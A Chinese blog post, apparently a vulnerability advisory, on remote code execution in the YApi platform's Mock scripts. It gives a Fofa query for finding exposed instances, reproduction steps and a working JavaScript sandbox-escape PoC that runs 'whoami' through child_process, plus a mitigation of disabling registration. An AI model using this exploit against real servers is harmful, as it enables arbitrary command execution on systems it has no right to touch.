Yapi Mock 远程代码执行漏洞

漏洞描述

YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响

Fofa

app="YApi"

1.主界面

2.默认开启注册功能,注册新用户

3.点击加号新建项目

4.添加接口

5.选择高级Mock-》开启-》写入POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

6.进入预览,点击Mock地址链接

7.查看结果权限为root

解决方案

Yapi作者已经停止更新。临时修复建议禁止用户注册,具体配置参考原文链接:
https://hellosean1025.github.io/yapi/devops/index.html#禁止注册

参考链接

https://mp.weixin.qq.com/s/y_oMGPvgL9Mm4IVDb6RjxA

posted @   追得上的梦想  阅读(692)  评论(0编辑  收藏  举报
编辑推荐:
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示